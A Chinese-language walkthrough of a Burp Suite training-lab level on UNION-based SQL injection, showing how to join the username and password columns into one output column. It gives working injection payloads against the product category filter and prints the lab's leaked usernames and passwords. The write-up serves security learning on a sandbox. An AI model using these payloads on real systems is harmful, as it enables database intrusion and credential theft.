bp官方靶场sql注入10

第十关 SQL 注入 UNION 攻击，在单列中检索多个值

这一关就是如何将多列数据在响应结果中显示为一列

提示：1、在产品类别筛选器中包含一个 SQL 注入漏洞

2、该数据库包含一个名为 users 的表，其列称为 username 和 password

操作：

1、随便点击个类别（操作见第八关同样的操作）

2、找到触发的数据包，发往repeater（操作见第八关同样的操作）

3、我自己试过了确定数据表是两列（操作见第九关同样的操作）

4、测试两个字段列是否是文本格式

尝试第一列：

' UNION SELECT 'aaa',NULL --

报错

尝试第二列

' UNION SELECT NULL,'aaa' --

插入成功

5、去靶场提示中找将多列值拼接成一列的sql语句

'foo'||'bar'

6、直接拦截数据包

' UNION SELECT NULL,username||password FROM users --
​
为了分隔开账户和密码：
' UNION SELECT NULL,username||'~'||password FROM users --

暴露出信息

carlos~m5ocq3r7c09gsegz16s4
wiener~s0c4u5nancloa0fkd637
administrator~298b0xzfs8wo0unzzcwo

7、利用暴露出的信息，成功登录 ，靶场通关